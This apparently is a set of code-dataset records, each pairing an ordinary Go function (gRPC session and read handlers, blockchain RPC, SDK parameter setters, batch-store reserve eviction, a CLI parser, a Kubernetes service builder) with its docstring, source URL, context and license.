rs.s.rwlock.RLock()
defer rs.s.rwlock.RUnlock()
queryCtx, ok := rs.s.queryCtxs[req.Name]
if !ok {
return nil, status.Errorf(codes.NotFound, "session %s not found", req.Name)
}
session := queryCtx.GetSession()
session.SetLastActive(time.Now())
return session.ToProto(), nil
}
func (rs *RPCServer) ListSessions(ctx context.Context, req *tspb.ListSessionsRequest) (*tspb.ListSessionsResponse, error) {
rs.s.rwlock.RLock()
defer rs.s.rwlock.RUnlock()
sessions := []*tspb.Session{}
for _, qctx := range rs.s.queryCtxs {
sess := qctx.GetSession().ToProto()
sessions = append(sessions, sess)
}
rsp := &tspb.ListSessionsResponse{
Sessions: sessions,
}
return rsp, nil
}
func (rs *RPCServer) DeleteSession(ctx context.Context, req *tspb.DeleteSessionRequest) (*emptypb.Empty, error) {
rs.s.rwlock.Lock()
defer rs.s.rwlock.Unlock()
queryCtx, ok := rs.s.queryCtxs[req.Name]
if !ok {
return &emptypb.Empty{}, nil
}
if err := queryCtx.Close(); err != nil {
logutil.Logger(ctx).Error("session close error", zap.Error(err), zap.String("session", req.Name))
return nil, status.Errorf(codes.Aborted, fmt.Sprintf("session %s close error, try later", req.Name))
}
delete(rs.s.queryCtxs, req.Name)
deleteSessionGerneralOK.Add(1)
return &emptypb.Empty{}, nil
}
func (rs *RPCServer) Read(ctx context.Context, req *tspb.ReadRequest) (*tspb.ResultSet, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
readCounterGerneralErr.Inc()
return nil, err
}
if len(req.ResumeToken) > 0 {
return nil, fmt.Errorf("read resumption not supported")
}
if len(req.PartitionToken) > 0 {
return nil, fmt.Errorf("partition restrictions not supported")
}
if req.GetTransaction() == nil {
readCounterGerneralErr.Inc()
return nil, status.Error(codes.FailedPrecondition, "no transaction selector in grpc request")
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, req.GetTransaction(), &rtOpt)
if err != nil {
readCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("fetch transaction error", zap.Error(err))
return nil, err
}
startTS := time.Now()
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
readCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("read error", zap.Error(err))
return nil, err
}
resultSet, err := rs.readRows(ctx, ri)
durRead := time.Since(startTS)
if err != nil {
executeReadDurationGeneralErr.Observe(durRead.Seconds())
sparseReadCounterGerneralErr.Inc()
return nil, err
}
executeReadDurationGeneralOK.Observe(durRead.Seconds())
readCounterGerneralOK.Inc()
return resultSet, nil
}
func (rs *RPCServer) readRows(ctx context.Context, ri session.RecordSet) (*tspb.ResultSet, error) {
resultSet := &tspb.ResultSet{
Metadata: buildResultSetMetaData(ri.Columns()),
Rows: []*tspb.ListValue{},
}
for {
row, err := ri.Next(ctx)
if err != nil {
break
}
resultSet.SliceRows = append(resultSet.SliceRows, row.(*tspb.SliceCell))
}
if ri.LastErr() != nil {
return nil, ri.LastErr()
}
return resultSet, nil
}
func (rs *RPCServer) SparseRead(ctx context.Context, req *tspb.SparseReadRequest) (*tspb.ResultSet, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
sparseReadCounterGerneralErr.Inc()
return nil, err
}
if len(req.ResumeToken) > 0 {
return nil, fmt.Errorf("read resumption not supported")
}
if len(req.PartitionToken) > 0 {
return nil, fmt.Errorf("partition restrictions not supported")
}
if req.GetTransaction() == nil {
sparseReadCounterGerneralErr.Inc()
return nil, status.Error(codes.FailedPrecondition, "no transaction selector in grpc request")
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, req.GetTransaction(), &rtOpt)
if err != nil {
sparseReadCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("fetch transaction error", zap.Error(err))
return nil, err
}
startTS := time.Now()
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
sparseReadCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("read error", zap.Error(err))
return nil, err
}
resultSet, err := rs.readRows(ctx, ri)
durRead := time.Since(startTS)
if err != nil {
executeReadDurationGeneralErr.Observe(durRead.Seconds())
sparseReadCounterGerneralErr.Inc()
return resultSet, err
}
executeReadDurationGeneralOK.Observe(durRead.Seconds())
sparseReadCounterGerneralOK.Inc()
return resultSet, nil
}
func (rs *RPCServer) SparseScan(ctx context.Context, req *tspb.SparseScanRequest) (*tspb.ResultSet, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
sparseReadCounterGerneralErr.Inc()
return nil, err
}
if len(req.ResumeToken) > 0 {
return nil, fmt.Errorf("read resumption not supported")
}
if len(req.PartitionToken) > 0 {
return nil, fmt.Errorf("partition restrictions not supported")
}
if req.GetTransaction() == nil {
sparseReadCounterGerneralErr.Inc()
return nil, status.Error(codes.FailedPrecondition, "no transaction selector in grpc request")
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, req.GetTransaction(), &rtOpt)
if err != nil {
sparseReadCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("fetch transaction error", zap.Error(err))
return nil, err
}
startTS := time.Now()
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
sparseReadCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("read error", zap.Error(err))
return nil, err
}
resultSet, err := rs.readRows(ctx, ri)
durRead := time.Since(startTS)
if err != nil {
executeReadDurationGeneralErr.Observe(durRead.Seconds())
sparseReadCounterGerneralErr.Inc()
return resultSet, err
}
executeReadDurationGeneralOK.Observe(durRead.Seconds())
sparseReadCounterGerneralOK.Inc()
return resultSet, nil
}
func (rs *RPCServer) Mutate(ctx context.Context, req *tspb.MutationRequest) (*tspb.MutationResponse, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
mutateCounterGerneralErr.Inc()
return nil, err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
if req.GetTransaction() == nil {
return nil, status.Errorf(codes.FailedPrecondition, "transaction selector should be specific")
}
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: true,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, req.GetTransaction(), &rtOpt)
if err != nil {
mutateCounterGerneralErr.Inc()
return nil, status.Errorf(codes.Aborted, "retrieve session transaction failed %v", err)
}
startTS := time.Now()
r, err := sess.HandleMutate(ctx, req, txn)
durMutate := time.Since(startTS)
if err != nil {
executeMutateDurationGeneralErr.Observe(durMutate.Seconds())
mutateCounterGerneralErr.Inc()
return nil, err
}
executeMutateDurationGeneralOK.Observe(durMutate.Seconds())
mutateCounterGerneralOK.Inc()
return rpc.BuildMutationResponse(r), nil
}
func (rs *RPCServer) StreamingRead(req *tspb.ReadRequest, stream tspb.Tablestore_StreamingReadServer) error {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
streamReadCounterGerneralErr.Inc()
return err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(stream.Context(), req.Table)
if err != nil {
return status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(stream.Context(), req.GetTransaction(), &rtOpt)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("fetch transaction error", zap.Error(err))
return err
}
ri, err := queryCtx.GetSession().HandleRead(stream.Context(), req, txn)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("mutate error", zap.Error(err))
return status.Error(codes.Aborted, err.Error())
}
return rs.readStream(stream.Context(), ri, stream.Send)
}
func (rs *RPCServer) readStream(ctx context.Context, ri session.RecordSet, send func(*tspb.PartialResultSet) error) error {
var (
row interface{}
err error
)
startTS := time.Now()
rsm := buildResultSetMetaData(ri.Columns())
for {
row, err = ri.Next(ctx)
if err != nil {
break
}
prs := &tspb.PartialResultSet{
Metadata: rsm,
RowCells: row.(*tspb.SliceCell),
}
if err = send(prs); err != nil {
break
}
rsm = nil
}
durRead := time.Since(startTS)
if ri.LastErr() != nil || (err != nil && err != io.EOF) {
streamReadCounterGerneralErr.Inc()
executeReadDurationGeneralErr.Observe(durRead.Seconds())
if ri.LastErr() != nil {
return ri.LastErr()
}
return err
}
executeReadDurationGeneralOK.Observe(durRead.Seconds())
streamReadCounterGerneralOK.Inc()
return nil
}
func (rs *RPCServer) StreamingSparseRead(req *tspb.SparseReadRequest, stream tspb.Tablestore_StreamingSparseReadServer) error {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
streamReadCounterGerneralErr.Inc()
return err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(stream.Context(), req.Table)
if err != nil {
return status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(stream.Context(), req.GetTransaction(), &rtOpt)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("fetch transaction error", zap.Error(err))
return err
}
ctx := sessionctx.SetStreamReadKey(stream.Context())
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("stream sparse read error", zap.Error(err))
return status.Error(codes.Aborted, err.Error())
}
return rs.readStream(ctx, ri, stream.Send)
}
func (rs *RPCServer) StreamingSparseScan(req *tspb.SparseScanRequest, stream tspb.Tablestore_StreamingSparseScanServer) error {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
streamReadCounterGerneralErr.Inc()
return err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(stream.Context(), req.Table)
if err != nil {
return status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(stream.Context(), req.GetTransaction(), &rtOpt)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("fetch transaction error", zap.Error(err))
return err
}
ctx := sessionctx.SetStreamReadKey(stream.Context())
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("stream sparse read error", zap.Error(err))
return status.Error(codes.Aborted, err.Error())
}
return rs.readStream(ctx, ri, stream.Send)
}
func (rs *RPCServer) BeginTransaction(ctx context.Context, req *tspb.BeginTransactionRequest) (*tspb.Transaction, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.GetSession())
if err != nil {
return nil, err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
txnSel := &tspb.TransactionSelector{
Selector: &tspb.TransactionSelector_Begin{
Begin: req.GetOptions(),
},
}
txn, err := sess.RetrieveTxn(ctx, txnSel, nil)
if err != nil {
logutil.Logger(ctx).Error("session retrieve transaction error", zap.Error(err), zap.String("session", req.Session))
return nil, status.Errorf(codes.Internal, "begin transaction error %v", err)
}
transaction := &tspb.Transaction{
Id: []byte(txn.ID),
}
return transaction, nil
} | Apache License 2.0 |
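A minimal retry sketch for the Commit contract described above (retry from the beginning, on the same session, when the server answers ABORTED). The commitOnce closure is hypothetical — it stands in for rebuilding the CommitRequest and calling the generated Tablestore client — and only the standard grpc status/codes packages are assumed.

package example

import (
	"context"
	"errors"
	"time"

	"google.golang.org/grpc/codes"
	"google.golang.org/grpc/status"
)

// commitWithRetry re-attempts a commit whenever the server returns ABORTED,
// as the Commit docstring requires. commitOnce is a hypothetical closure that
// rebuilds a fresh CommitRequest (same session, same mutations) and invokes
// the generated client's Commit method.
func commitWithRetry(ctx context.Context, commitOnce func(context.Context) error) error {
	backoff := 50 * time.Millisecond
	for attempt := 0; attempt < 5; attempt++ {
		err := commitOnce(ctx)
		if err == nil {
			return nil
		}
		if status.Code(err) != codes.Aborted {
			return err // not retryable under this contract
		}
		select {
		case <-ctx.Done():
			return ctx.Err()
		case <-time.After(backoff):
			backoff *= 2 // simple exponential backoff between attempts
		}
	}
	return errors.New("commit aborted too many times")
}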
33cn/chain33 | rpc/grpchandler.go | GetBlocks | go | func (g *Grpc) GetBlocks(ctx context.Context, in *pb.ReqBlocks) (*pb.Reply, error) {
reply, err := g.cli.GetBlocks(&pb.ReqBlocks{
Start: in.Start,
End: in.End,
IsDetail: in.IsDetail,
})
if err != nil {
return nil, err
}
return &pb.Reply{
IsOk: true,
Msg: pb.Encode(reply)},
nil
} | GetBlocks gets blocks via gRPC | https://github.com/33cn/chain33/blob/bfe0910b872e30fe937e270e9fc8e2f0db882125/rpc/grpchandler.go#L144-L157 | package rpc
import (
"time"
"strings"
"github.com/33cn/chain33/common"
pb "github.com/33cn/chain33/types"
"golang.org/x/net/context"
)
func (g *Grpc) SendTransactionSync(ctx context.Context, in *pb.Transaction) (*pb.Reply, error) {
reply, err := g.cli.SendTx(in)
if err != nil {
return reply, err
}
hash := in.Hash()
for i := 0; i < 100; i++ {
detail, err := g.cli.QueryTx(&pb.ReqHash{Hash: hash})
if err == pb.ErrInvalidParam || err == pb.ErrTypeAsset {
return nil, err
}
if detail != nil {
return &pb.Reply{IsOk: true, Msg: hash}, nil
}
time.Sleep(time.Second / 3)
}
return nil, pb.ErrTimeout
}
func (g *Grpc) SendTransaction(ctx context.Context, in *pb.Transaction) (*pb.Reply, error) {
return g.cli.SendTx(in)
}
func (g *Grpc) SendTransactions(ctx context.Context, in *pb.Transactions) (*pb.Replies, error) {
if len(in.GetTxs()) == 0 {
return nil, nil
}
reps := &pb.Replies{ReplyList: make([]*pb.Reply, 0, len(in.GetTxs()))}
for _, tx := range in.GetTxs() {
reply, err := g.cli.SendTx(tx)
if err != nil {
reply = &pb.Reply{Msg: []byte(err.Error())}
}
reps.ReplyList = append(reps.ReplyList, reply)
}
return reps, nil
}
func (g *Grpc) CreateNoBalanceTxs(ctx context.Context, in *pb.NoBalanceTxs) (*pb.ReplySignRawTx, error) {
reply, err := g.cli.CreateNoBalanceTxs(in)
if err != nil {
return nil, err
}
tx := pb.Encode(reply)
return &pb.ReplySignRawTx{TxHex: common.ToHex(tx)}, nil
}
func (g *Grpc) CreateNoBalanceTransaction(ctx context.Context, in *pb.NoBalanceTx) (*pb.ReplySignRawTx, error) {
params := &pb.NoBalanceTxs{
TxHexs: []string{in.GetTxHex()},
PayAddr: in.GetPayAddr(),
Privkey: in.GetPrivkey(),
Expire: in.GetExpire(),
}
reply, err := g.cli.CreateNoBalanceTxs(params)
if err != nil {
return nil, err
}
tx := pb.Encode(reply)
return &pb.ReplySignRawTx{TxHex: common.ToHex(tx)}, nil
}
func (g *Grpc) CreateRawTransaction(ctx context.Context, in *pb.CreateTx) (*pb.UnsignTx, error) {
reply, err := g.cli.CreateRawTransaction(in)
if err != nil {
return nil, err
}
return &pb.UnsignTx{Data: reply}, nil
}
func (g *Grpc) ReWriteRawTx(ctx context.Context, in *pb.ReWriteRawTx) (*pb.UnsignTx, error) {
reply, err := g.cli.ReWriteRawTx(in)
if err != nil {
return nil, err
}
return &pb.UnsignTx{Data: reply}, nil
}
func (g *Grpc) CreateTransaction(ctx context.Context, in *pb.CreateTxIn) (*pb.UnsignTx, error) {
pb.AssertConfig(g.cli)
cfg := g.cli.GetConfig()
execer := cfg.ExecName(string(in.Execer))
exec := pb.LoadExecutorType(execer)
if exec == nil {
log.Error("callExecNewTx", "Error", "exec not found")
return nil, pb.ErrNotSupport
}
msg, err := exec.GetAction(in.ActionName)
if err != nil {
return nil, err
}
err = pb.Decode(in.Payload, msg)
if err != nil {
return nil, err
}
reply, err := pb.CallCreateTx(cfg, execer, in.ActionName, msg)
if err != nil {
return nil, err
}
return &pb.UnsignTx{Data: reply}, nil
}
func (g *Grpc) CreateRawTxGroup(ctx context.Context, in *pb.CreateTransactionGroup) (*pb.UnsignTx, error) {
reply, err := g.cli.CreateRawTxGroup(in)
if err != nil {
return nil, err
}
return &pb.UnsignTx{Data: reply}, nil
}
func (g *Grpc) QueryTransaction(ctx context.Context, in *pb.ReqHash) (*pb.TransactionDetail, error) {
return g.cli.QueryTx(in)
} | BSD 3-Clause New or Revised License |
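GetBlocks above packs its reply with pb.Encode into Reply.Msg, so callers have to decode it again. A hypothetical caller-side sketch of that decode step; the concrete payload type (pb.BlockDetails) is an assumption and is not shown in this record.

package example

import (
	"errors"

	pb "github.com/33cn/chain33/types"
)

// decodeBlocks mirrors the pb.Encode call inside GetBlocks: it unpacks the
// Reply.Msg bytes back into the assumed pb.BlockDetails message.
func decodeBlocks(reply *pb.Reply) (*pb.BlockDetails, error) {
	if !reply.IsOk {
		return nil, errors.New(string(reply.Msg)) // server reported a failure
	}
	var details pb.BlockDetails
	if err := pb.Decode(reply.Msg, &details); err != nil {
		return nil, err
	}
	return &details, nil
}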
pydio/cells-sdk-go | client/user_service/put_roles_parameters.go | SetLogin | go | func (o *PutRolesParams) SetLogin(login string) {
o.Login = login
} | SetLogin adds the login to the put roles params | https://github.com/pydio/cells-sdk-go/blob/25705a3e4eebd44f9f2a253098c0c0b9b5018adc/client/user_service/put_roles_parameters.go#L117-L119 | package user_service
import (
"net/http"
"time"
"golang.org/x/net/context"
"github.com/go-openapi/errors"
"github.com/go-openapi/runtime"
cr "github.com/go-openapi/runtime/client"
strfmt "github.com/go-openapi/strfmt"
models "github.com/pydio/cells-sdk-go/models"
)
func NewPutRolesParams() *PutRolesParams {
var ()
return &PutRolesParams{
timeout: cr.DefaultTimeout,
}
}
func NewPutRolesParamsWithTimeout(timeout time.Duration) *PutRolesParams {
var ()
return &PutRolesParams{
timeout: timeout,
}
}
func NewPutRolesParamsWithContext(ctx context.Context) *PutRolesParams {
var ()
return &PutRolesParams{
Context: ctx,
}
}
func NewPutRolesParamsWithHTTPClient(client *http.Client) *PutRolesParams {
var ()
return &PutRolesParams{
HTTPClient: client,
}
}
type PutRolesParams struct {
Login string
Body *models.IdmUser
timeout time.Duration
Context context.Context
HTTPClient *http.Client
}
func (o *PutRolesParams) WithTimeout(timeout time.Duration) *PutRolesParams {
o.SetTimeout(timeout)
return o
}
func (o *PutRolesParams) SetTimeout(timeout time.Duration) {
o.timeout = timeout
}
func (o *PutRolesParams) WithContext(ctx context.Context) *PutRolesParams {
o.SetContext(ctx)
return o
}
func (o *PutRolesParams) SetContext(ctx context.Context) {
o.Context = ctx
}
func (o *PutRolesParams) WithHTTPClient(client *http.Client) *PutRolesParams {
o.SetHTTPClient(client)
return o
}
func (o *PutRolesParams) SetHTTPClient(client *http.Client) {
o.HTTPClient = client
}
func (o *PutRolesParams) WithLogin(login string) *PutRolesParams {
o.SetLogin(login)
return o
} | Apache License 2.0 |
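A short builder sketch for the generated parameters above, using only constructors and setters present in this file (NewPutRolesParamsWithTimeout, WithLogin and the exported Body field); the import path is inferred from the repository layout, and the surrounding client call is omitted because it is not part of this record.

package example

import (
	"time"

	"github.com/pydio/cells-sdk-go/client/user_service"
	"github.com/pydio/cells-sdk-go/models"
)

// buildPutRolesParams chains the generated setters: a request timeout, the
// login path parameter, and the IdmUser body carrying the roles to apply.
func buildPutRolesParams(login string, user *models.IdmUser) *user_service.PutRolesParams {
	params := user_service.NewPutRolesParamsWithTimeout(30 * time.Second).
		WithLogin(login)
	params.Body = user
	return params
}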
ethersphere/bee | pkg/postage/batchstore/reserve.go | evictOuter | go | func (s *store) evictOuter(last *postage.Batch) error {
if s.rs.Available >= 0 {
return nil
}
err := s.store.Iterate(valueKeyPrefix, func(key, _ []byte) (bool, error) {
batchID := valueKeyToID(key)
b := last
if !bytes.Equal(b.ID, batchID) {
var err error
b, err = s.Get(batchID)
if err != nil {
return true, fmt.Errorf("release get %x %v: %w", batchID, b, err)
}
}
if b.Value.Cmp(s.rs.Outer) < 0 {
return false, nil
}
if s.rs.Available >= 0 && s.rs.Outer.Cmp(b.Value) != 0 {
return true, nil
}
s.rs.Available += exp2(uint(b.Depth) - uint(s.rs.Radius) - 1)
s.rs.Outer.Set(b.Value)
return false, s.unreserveFn(b.ID, s.rs.Radius)
})
if err != nil {
return err
}
s.rs.Outer.Add(s.rs.Outer, big1)
if s.rs.Available < 0 {
s.rs.Radius++
s.rs.Outer.Set(s.rs.Inner)
return s.evictOuter(last)
}
return s.store.Put(reserveStateKey, s.rs)
} | evictOuter is responsible for keeping capacity positive by unreserving lowest priority batches | https://github.com/ethersphere/bee/blob/a7d86e068f7eb34703565d90e2e567d16b782a0e/pkg/postage/batchstore/reserve.go#L329-L371 | package batchstore
import (
"bytes"
"encoding/binary"
"errors"
"fmt"
"math/big"
"strings"
"github.com/ethersphere/bee/pkg/postage"
"github.com/ethersphere/bee/pkg/storage"
"github.com/ethersphere/bee/pkg/swarm"
)
var DefaultDepth = uint8(12)
var Capacity = exp2(22)
var big1 = big.NewInt(1)
type reserveState struct {
Radius uint8 `json:"radius"`
StorageRadius uint8 `json:"storageRadius"`
Available int64 `json:"available"`
Outer *big.Int `json:"outer"`
Inner *big.Int `json:"inner"`
}
func (s *store) unreserve(b []byte, radius uint8) error {
c := s.queueIdx
c++
v := make([]byte, 8)
binary.BigEndian.PutUint64(v, c)
i := &UnreserveItem{BatchID: b, Radius: radius}
if err := s.store.Put(fmt.Sprintf("%s_%s", unreserveQueueKey, string(v)), i); err != nil {
return err
}
if err := s.putQueueCardinality(c); err != nil {
return err
}
s.queueIdx = c
return nil
}
func (s *store) Unreserve(cb postage.UnreserveIteratorFn) error {
var entries []string
defer func() {
for _, v := range entries {
if err := s.store.Delete(v); err != nil {
s.logger.Errorf("batchstore: unreserve entry delete: %v", err)
return
}
}
}()
return s.store.Iterate(unreserveQueueKey, func(key, val []byte) (bool, error) {
if !strings.HasPrefix(string(key), unreserveQueueKey) {
return true, nil
}
v := &UnreserveItem{}
err := v.UnmarshalBinary(val)
if err != nil {
return true, err
}
stop, err := cb(v.BatchID, v.Radius)
if err != nil {
return true, err
}
s.rsMtx.Lock()
defer s.rsMtx.Unlock()
if s.rs.StorageRadius+1 < v.Radius {
s.rs.StorageRadius = v.Radius - 1
s.metrics.StorageRadius.Set(float64(s.rs.StorageRadius))
if err = s.store.Put(reserveStateKey, s.rs); err != nil {
return true, err
}
}
entries = append(entries, string(key))
if stop {
return true, nil
}
return false, nil
})
}
func (s *store) evictExpired() error {
var toDelete [][]byte
until := new(big.Int)
if s.rs.Inner.Cmp(big.NewInt(0)) > 0 && s.cs.TotalAmount.Cmp(s.rs.Inner) >= 0 {
until.Add(s.cs.TotalAmount, big1)
} else {
until.Set(s.rs.Inner)
}
var multiplier int64
err := s.store.Iterate(valueKeyPrefix, func(key, _ []byte) (bool, error) {
b, err := s.Get(valueKeyToID(key))
if err != nil {
return true, err
}
if b.Value.Cmp(until) >= 0 {
return true, nil
}
if multiplier == 0 && b.Value.Cmp(s.rs.Inner) >= 0 {
multiplier = 1
}
if multiplier == 1 && b.Value.Cmp(s.rs.Outer) >= 0 {
multiplier = 2
}
err = s.evictFn(b.ID)
if err != nil {
return true, err
}
s.rs.Available += multiplier * exp2(uint(b.Radius-s.rs.Radius-1))
if b.Value.Cmp(s.cs.TotalAmount) <= 0 {
toDelete = append(toDelete, b.ID)
}
return false, nil
})
if err != nil {
return err
}
s.rs.Inner.Set(until)
if s.rs.Outer.Cmp(until) < 0 {
s.rs.Outer.Set(until)
}
if err = s.store.Put(reserveStateKey, s.rs); err != nil {
return err
}
return s.delete(toDelete...)
}
type tier int
const (
unreserved tier = iota
inner
outer
)
func (rs *reserveState) change(oldv, newv *big.Int, oldDepth, newDepth uint8) (int64, uint8) {
oldTier := rs.tier(oldv)
newTier := rs.setLimits(newv, rs.tier(newv))
oldSize := rs.size(oldDepth, oldTier)
newSize := rs.size(newDepth, newTier)
availableCapacityChange := oldSize - newSize
reserveRadius := rs.radius(newTier)
return availableCapacityChange, reserveRadius
}
func (rs *reserveState) size(depth uint8, t tier) int64 {
size := exp2(uint(depth - rs.Radius - 1))
switch t {
case inner:
return size
case outer:
return 2 * size
default:
return 0
}
}
func (rs *reserveState) tier(x *big.Int) tier {
if x.Cmp(rs.Inner) < 0 || rs.Inner.Cmp(big.NewInt(0)) == 0 {
return unreserved
}
if x.Cmp(rs.Outer) < 0 {
return inner
}
return outer
}
func (rs *reserveState) radius(t tier) uint8 {
switch t {
case unreserved:
return swarm.MaxPO
case inner:
return rs.Radius
default:
return rs.Radius - 1
}
}
func (rs *reserveState) setLimits(val *big.Int, newTier tier) tier {
if newTier != unreserved {
return newTier
}
var adjustedTier tier
if rs.Inner.Cmp(big.NewInt(0)) == 0 || rs.Inner.Cmp(val) > 0 {
adjustedTier = inner
if rs.Outer.Cmp(rs.Inner) == 0 {
rs.Outer.Set(val)
adjustedTier = outer
}
rs.Inner.Set(val)
}
return adjustedTier
}
func (s *store) update(b *postage.Batch, oldDepth uint8, oldValue *big.Int) error {
newValue := b.Value
newDepth := b.Depth
capacityChange, reserveRadius := s.rs.change(oldValue, newValue, oldDepth, newDepth)
s.rs.Available += capacityChange
if err := s.unreserveFn(b.ID, reserveRadius); err != nil {
return err
}
err := s.evictOuter(b)
if err != nil {
return err
}
s.metrics.AvailableCapacity.Set(float64(s.rs.Available))
s.metrics.Radius.Set(float64(s.rs.Radius))
s.metrics.Inner.Set(float64(s.rs.Inner.Int64()))
s.metrics.Outer.Set(float64(s.rs.Outer.Int64()))
return nil
} | BSD 3-Clause New or Revised License |
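A tiny, self-contained arithmetic sketch of the reserve accounting that evictOuter manipulates: a batch of depth d at radius r occupies 2^(d-r-1) slots while in the inner tier and twice that in the outer tier (mirroring reserveState.size above); exp2 is redefined here only so the sketch compiles on its own.

package main

import "fmt"

// exp2 mirrors the batchstore helper: 2^n as an int64.
func exp2(n uint) int64 { return int64(1) << n }

// reserveSlots reproduces reserveState.size: inner-tier batches reserve
// 2^(depth-radius-1) chunks, outer-tier batches reserve twice as many.
func reserveSlots(depth, radius uint8, outer bool) int64 {
	slots := exp2(uint(depth - radius - 1))
	if outer {
		return 2 * slots
	}
	return slots
}

func main() {
	// Example: a depth-20 batch at radius 8.
	fmt.Println(reserveSlots(20, 8, false)) // 2048 slots while in the inner tier
	fmt.Println(reserveSlots(20, 8, true))  // 4096 slots while in the outer tier
}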
kylebanks/commuter | cli/parser.go | parseConfigureCmd | go | func (a *ArgParser) parseConfigureCmd(s cmd.StorageProvider) (*cmd.ConfigureCmd, error) {
return &cmd.ConfigureCmd{
Input: NewStdin(),
Store: s,
}, nil
} | parseConfigureCmd parses and returns a ConfigureCmd. | https://github.com/kylebanks/commuter/blob/a021e2d6424b9fe12415ad5ff25cbd433004ac6f/cli/parser.go#L40-L45 | package cli
import (
"flag"
"github.com/KyleBanks/commuter/cmd"
"github.com/KyleBanks/commuter/pkg/geo"
)
type ArgParser struct {
Args []string
}
func NewArgParser(args []string) *ArgParser {
return &ArgParser{
Args: args,
}
}
func (a *ArgParser) Parse(conf *cmd.Configuration, s cmd.StorageProvider) (cmd.RunnerValidator, error) {
if conf == nil || len(a.Args) == 0 {
return a.parseConfigureCmd(s)
}
switch a.Args[0] {
case cmdAdd:
return a.parseAddCmd(s, a.Args[1:])
case cmdList:
return a.parseListCmd(s, a.Args[1:])
}
return a.parseCommuteCmd(conf, a.Args)
} | MIT License |
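A wiring sketch for the parser above. Parse needs a *cmd.Configuration and a cmd.StorageProvider; both come from elsewhere in the commuter codebase, so they are plain parameters here and the returned RunnerValidator is left for the caller to validate and execute.

package example

import (
	"fmt"
	"os"

	"github.com/KyleBanks/commuter/cli"
	"github.com/KyleBanks/commuter/cmd"
)

// run shows how ArgParser is meant to be driven from main: hand it the raw
// CLI arguments (minus the program name) plus the loaded configuration and
// storage provider.
func run(conf *cmd.Configuration, store cmd.StorageProvider) {
	parser := cli.NewArgParser(os.Args[1:])
	runner, err := parser.Parse(conf, store)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	_ = runner // a cmd.RunnerValidator, to be validated and executed by the caller
}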
k8ssandra/cass-operator | pkg/reconciliation/construct_service.go | newNodePortServiceForCassandraDatacenter | go | func newNodePortServiceForCassandraDatacenter(dc *api.CassandraDatacenter) *corev1.Service {
service := makeGenericHeadlessService(dc)
service.ObjectMeta.Name = dc.GetNodePortServiceName()
service.Spec.Type = "NodePort"
service.Spec.ClusterIP = ""
service.Spec.ExternalTrafficPolicy = corev1.ServiceExternalTrafficPolicyTypeLocal
nativePort := dc.GetNodePortNativePort()
internodePort := dc.GetNodePortInternodePort()
service.Spec.Ports = []corev1.ServicePort{
{
Name: "internode",
Port: int32(internodePort),
NodePort: int32(internodePort),
TargetPort: intstr.FromInt(internodePort),
},
{
Name: "native",
Port: int32(nativePort),
NodePort: int32(nativePort),
TargetPort: intstr.FromInt(nativePort),
},
}
